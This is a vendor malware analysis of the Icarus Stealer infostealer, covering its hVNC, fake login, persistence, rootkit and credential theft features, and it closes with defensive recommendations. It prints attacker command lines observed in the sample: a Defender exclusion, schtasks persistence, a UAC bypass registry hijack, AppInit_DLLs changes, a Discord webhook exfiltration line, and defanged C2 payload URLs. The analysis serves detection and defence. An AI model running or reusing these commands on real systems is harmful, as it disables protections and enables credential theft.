eSentire Threat Intelligence Malware Analysis: Icarus Stealer

First introduced in July 2022, Icarus Stealer is an infostealer malware that uses an hVNC capability so that the threat actor can create a new hidden desktop to navigate through the infected computer system without interacting with the main desktop. Icarus Stealer is also significantly cheaper compared to other popular infostealers like Redline Stealer and Raccoon Stealer, making it easier for inexperienced cybercriminals to use.

This malware analysis delves deeper into the technical details of how the Icarus Stealer malware operates and our security recommendations to protect your organization from being exploited.

The Project Icarus Case Study

First mention of Icarus Stealer appeared on hacking forums in July 2022 (Figure 1).

Icarus stealer claims to have numerous functionalities that include 2FA bypass, rootkit hVNC, encrypted connection, XOR/AES payload encryption, a fake login page, shellcode payload, export the payload as macro, RunPE (process hollowing technique), Telegram stealers, Discord stealers, password recovery and more (Figure 2).

What makes Icarus Stealer different from other stealers such as Raccoon Stealer and Redline Stealer is that it uses an hVNC (Hidden Virtual Network Computing) capability, which lets an attacker create a new hidden desktop to navigate through the computer system without interacting with the main desktop.

A normal user would not notice any interactions from the attacker in the main desktop unless they open the Task Manager. Icarus Stealer provides the ability to build a stub for .NET 2 (if the payload is generated to run on Windows 7) and .NET 4 (for the payloads on Windows 8 and up) versions. Stub is a separate part of the malware which the encrypted malware is tied to.

When the malware startups, the stub would begin to decrypt the malware that was initially encrypted with a crypter and run it in memory. This is used to bypass signature and heuristic-based detections.

The stealer is sold for $79.99/month, $189.99/3 months, $299.99/6 months, and $899.99 for a lifetime access, which is significantly cheaper compared to Redline Stealer and Raccoon Stealer, which are $150 and $275 per month respectively.

Icarus Stealer is also distributed by other users on Telegram channels (Figure 4).

Icarus Stealer Analysis

One of the main functionalities of Icarus Stealer is the Payload Builder (Figure 5). An attacker can manually specify the listener port to keep a constant connection with the infected machines. The default listening port is 8880.

The default name tag for the Icarus Stealer client is Icarus_Client but the threat actor can modify the name. The payload file name generation is randomized, and the filename can be customized by a malicious actor. Some of the Icarus Stealer features include:

• Fake Login – The fake login feature contains a FakeLogonScreen application within the payload used to generate a fake login screen for the user when they launch the stealer (Figure 6). The user would try to enter the Active Directory credentials into the password field, the password is then sent out to an attacker’s Discord channel or Telegram.
  
  Upon execution of the payload containing FakeLogonScreen application, two files are dropped under %AppData%\Local\Temp – svchost.exe and svchost.bat. FakeLogonScreen would also write an output in a user.db file under %LOCALAPPDATA%\Microsoft\user.db. The contents of the user.db file is the following: <Username>: <Password> --> Wrong --> Ip:<REDACTED>, where the IP address is the IP of the infected host.
  
  The svchost.exe is the Icarus Stealer payload in an unencrypted form. The files will be deleted upon a successful submission of credentials. The svchost.bat file contains the following command: %LOCALAPPDATA%\Temp\svchost.exe https://discord.com/api/webhoo...[REDACTED] DEL "%~f0". Upon batch file execution, the svchost.exe (Icarus Stealer) process calls out to the attacker’s Discord webhook URL to deliver the user’s entered credentials from user.db file as shown in Figure 7.
  
• Watcher – The malware developer claims that with Watcher enabled, the hVNC process can be restarted after termination in the Task Manager. With this option, upon executing the malware, the file that is responsible for launching the malware again is dropped under %LOCALAPPDATA%\Temp\.
  
  We have observed the following filenames being dropped: YourPhone.exe, system.exe, PhoneExperienceHost.exe, RuntimeBroker.exe, Start.exe, MSBuilds.exe, cvtresa.exe, SMSHoists.exe. The dropped files are the .NET executable with the file size of 5KB. The main stealer payload injects itself into cvtres.exe process (Figure 8).
  The dropped payload is supposed to launch the cvtres.exe file under %LOCALAPPDATA%\Temp\ folder every 1000 milliseconds (Figure 9). We did not observe cvtres.exe to be dropped under the mentioned path and upon termination of the Icarus Stealer process, it is not able to restart again.
  It is also worth mentioning that Icarus Stealer runs the following command to exclude the cvtres.exe process from Microsoft Defender Antivirus scans:
  
  - "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
  
  After the payload has been successfully injected into cvtres.exe process, the process would run with the following parameters:
  
  - "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client (or custom name set by the threat actor) <C2_IP> <PORT> <random characters>
  
  The infected host sends the following information to the C2 to check-in: ICARUS_Client_ | username@computer name|US|OS Name|infection date (format: mm/dd/yyyy)|Icarus Stealer version (newest is 2.0.0.1)|infected machine public IP.
• Startup – The startup feature allows the Icarus Stealer to achieve the persistence via the scheduled task. If an attacker generates the batch payload, the scheduled task name would be constant – “DefaultDomain”. If the payload is generated as the binary/executable file, the scheduled task would have the name of the executable file. The examples of the scheduled tasks created:
  • schtasks /create /f /sc onlogon /rl highest /tn "payload.bat" /tr '"DefaultDomain"'
  • schtasks /create /f /sc onlogon /rl highest /tn "payload" /tr '"payload.exe"'
• As Macro – This capability allows the malicious actor to generate a macro to add to the Word or Excel document, the actor can also specify on whether to encrypt the macro code or not. The APIs such as CreateThread, VirtualAlloc and RtlMoveMemory are used to execute the payload directly from the memory and in a new thread. The script also performs some basic sandbox checks mentioned below:
  
  If the number of recently opened files is less than 3 then the macro exits, and the payload execution fails (Figure 10). Then the script continues to enumerate the number of cores on the host and if it’s less than 3, the macro execution terminates.
  
• As Shellcode – This allows the payload to be saved as a shellcode in a .bin format (Figure 11).
  
• Rootkit – The rootkit capability allows the cvtres.exe process to run as a hidden process. Upon running the stealer with rootkit capabilities, it would first fetch the rootkit and the installation module (MD5: a532918af845ed035c6882d6ae173d03) from the C2 (Figure 12).First, it checks if the user is an Administrator on the host and if not, it would attempt to bypass User Account Control (UAC) by using ComputerDefaults.exe. The stealer would set the value of DelegateExecute to 0 and hijacks the Default value within the registry path HKCU\Software\CLASSES\ms-settings\shell\open\command with the rootkit installer binary residing under %LOCALAPPDATA%\Temp\ (Figures 13-14).Next, it checks if the rootkit DLL r77-x64.dll (MD5: 8d54e4abe1762f96134a0c874cfb8cdcexists under AppData\Roaming folder. If the rootkit exists, the stealer proceeds with the Install module that sets the following registry values to achieve the persistence (T1546.010):
  - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LoadAppInit_DLLs to 1 (enabling AppInit_DLLs)
  - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\RequireSignedAppInit_DLLs to 0 (load any DLLs)
  - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs to C:\Users\<username>\AppData\Local\Temp\r77-<32-random-characters>-x64.dll (for 32-bit systems)
  - HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows\ to C:\Users\<username>\AppData\Local\Temp\r77--<32-random-characters>-x86.dll (for 64-bit systems)
  
  It is worth mentioning that the rootkits binaries are dropped in two places: AppData\Roaming and %LOCALAPPDATA%\Temp folders.
  
  If the rootkit is not found under the mentioned folder, the stealer creates the rootkit binaries using File.WriteAllBytes method. After a successful rootkit installation, the stealer terminates opens the cmd.exe and runs “/k start /b TASKKILL /IM Taskmgr.exe & exit" to terminate the Task Manager in a hidden window (Figures 15-16).
  
  
• As Vbs (comes with the newest stealer update V2.0.0.1) – This option generates the payload as a VBS script (Figure 17).
  
• CCleaner (comes with the newest stealer update V2.0.0.1) – According to the developer, the feature is a virus remover that runs on a hidden desktop. The “cleaner” application is directly fetched from C2 (hxxp://193.31.116[.]239/crypt/public/Update_Downloads/AdvKillBot.jpg). The base64-decoded file is approximately 473 MB in size and is written in .NET. The strings are encrypted using the plain XOR (Figures 18-19).The stealer proceeds with scheduled task creation, the SilentCleanup XML contains the following (Figure 20):
  The tasks runs the cleanmgr.exe, which is the Disk Space Cleanup Manager utility for Windows. Next, the stealer unzips the contents of the downloaded mwkil.zip archive into the %LOCALAPPDATA%\Temp directory. The “AdvKillBot” feature is actually the TronScript which is an automated PC cleanup script (Figure 21-22).
  
• Bot Killer (comes with the newest stealer update V2.0.0.1) – this capability removes existing viruses to make the hVNC operate faster. The stealer would operate extremely slow if the infected host is already infected with other malware. The Bot Killer component is fetched from the command and control (C2) server hxxp://193.31.116[.]239/crypt/public/Update_Downloads/bb.jpg (MD5: 735ad7684fdb6230972cf600980c0392). The decoded file is packed with UPX packer (Figure 23).The executable contains the functionality to convert the batch files to an executable as shown in Figure 24.Besides the Bat to Exe functionality the binary contains the bat file that is dropped under %LOCALAPPDATA%\Temp\<4 random characters>.tmp\KillBots.bat (Figure 25). The batch file looks for running processes RegAsm.exe, RegSvcs.exe, MSBuild.exe, csc.exe, cvtres.exe and terminates them. eSentire Threat Intelligence (TI) assesses the chances as probable that these are the processes that are abused for injection by other malware, such as AsyncRAT, AgentTesla and Redline Stealer.
  
• Additionally, the batch options exist that would let an attacker to specify the following:
  • Anti VM – The stealer will not execute if it is running in virtual environments such as VirtualBox and VMware (Figure 26).
    
  • Self-Delete – With the self-delete capability, the batch file gets deleted after the successful execution via the following command line C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h "C:\Users\user\Desktop\self_delete.bat.exe" & del "
  • Hidden – According to the stealer developer, the feature allows Icarus to hide the file payload after running. However, eSentire TRU has not observed any evasion attempts.
  • Anti-Debug – This feature prevents the payload from being debugged by calling out IsDebuggerPresent function.

AES and XOR encryption can be applied during the batch payload generation. The keys are randomly generated by the stealer as shown in Figure 27.

Upon the execution of the encrypted batch payload, the renamed PowerShell application is dropped into the working directory to decrypt the batch file. An example of the XOR and AES encryptions are shown in Figures 28-29.

The main hVNC panel (Figure 30) contains the following options:

• Apps – Allows the attacker to open the following applications on user’s desktop:
  • Outlook
  • Foxmail
  • Thunderbird
  • Skype
  • Discord
  • Telegram
  • DingTalk
• Browsers – Allows the attacker to open the following browsers:
  • Chrome
  • Edge
  • Firefox
  • Brave
  • Epic
  • Vivaldi
  • 360
  • Sputnik
  • Comodo
  • Opera Neon
  • WaterFox
  • Orbitum
  • Atom
  • Slimjet
• System – Spawns the following applications on the infected host (it is worth nothing that the mentioned applications are not able to run as Administrator):
  • msinfo32.exe (Microsoft System Information)
  • mstsc.exe (Remote Desktop Connection)
  • Notepad
  • Control Panel
  • PowerShell
  • CMD
  • Explorer



• Recovery – Lets an attacker steal the data and sends it out to Discord/Telegram channels. The example of the received data is shown in Figures 31-32.
  
• Exec – Lets an attacker launch an executable file directly from the URL.
• Watcher – The functionality lets an attacker relaunch the stealer payload after it terminates the running processes. This feature does not work on the infected machines.
• Kill WD – The feature disables Windows Defender on the infected host, but this feature does not work.
• Clone Profile options allows an attacker to clone the user’s browser profile including cookies and history, this is what the malware developer advertises to be a Two-Factor Authentication (2FA) bypass feature. If the infected user has the session active in their browser, an attacker can launch the browser in parallel and browse through the same websites as the infected user while being logged in.

The list of wallets that Icarus exfiltrates from the browser extensions:

The list of wallets fingerprinted on the host:

The stealer exfiltrates credentials from the following browsers:

• Coowon
• Liebao (Cheetah) Browser
• QIP Surf
• Orbitum
• Comodo IceDragon
• Amigo
• Torch
• Yandex
• 360Browser
• Maxthon3
• K-Melon
• CocCoc
• Brave
• Mozilla Firefox
• Chromium
• Google Chrome
• Opera
• Iridium
• 7Star
• CentBrowser
• Chedot
• Vivaldi
• Kometa
• Elements Browser
• Epic Privacy Browser
• Uran by uCozMedia
• Citrio
• ChromePlus

How eSentire is Responding

Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create action-oriented outcomes for our customers. We are taking a full-scale response approach to fight modern cybersecurity threats by deploying countermeasures, such as: 

• Implementing threat detections and leveraging BlueSteel, our machine-learning powered PowerShell classifier, to identify malicious command execution and ensuring that eSentire has visibility and detections are in place across eSentire MDR for Endpoint and esNetwork.
• Performing global threat hunts for indicators associated with Icarus Stealer.

Our detection content is supported by investigation runbooks, ensuring our SOC (Security Operations Center) analysts respond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures. In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU) 

We recommend implementing the following controls to help secure your organization against Icarus Stealer malware:

• Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions
• Implement a Phishing and Security Awareness Training (PSAT) program that informs and educates employees on emerging threats in the threat landscape
• Encourage your employees to use password managers instead of using the password storage feature provided by web browsers.

While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.

eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.

Appendix

• https://attack.mitre.org/techniques/T1055/012/
• https://attack.mitre.org/techniques/T1546/010/
• https://twitter.com/struppigel/status/1566685309093511170
• https://github.com/bitsadmin/fakelogonscreen
• https://learn.microsoft.com/en-us/windows/win32/win7appqual/appinit-dlls-in-windows-7-and-windows-server-2008-r2
• https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent
• https://learn.microsoft.com/en-us/dotnet/api/system.io.file.writeallbytes?view=net-6.0
• https://www.reddit.com/r/TronScript/comments/xbw3u2/tron_v1203_20220911_minor_utility_updates/

Indicators of Compromise

MITRE ATT&CK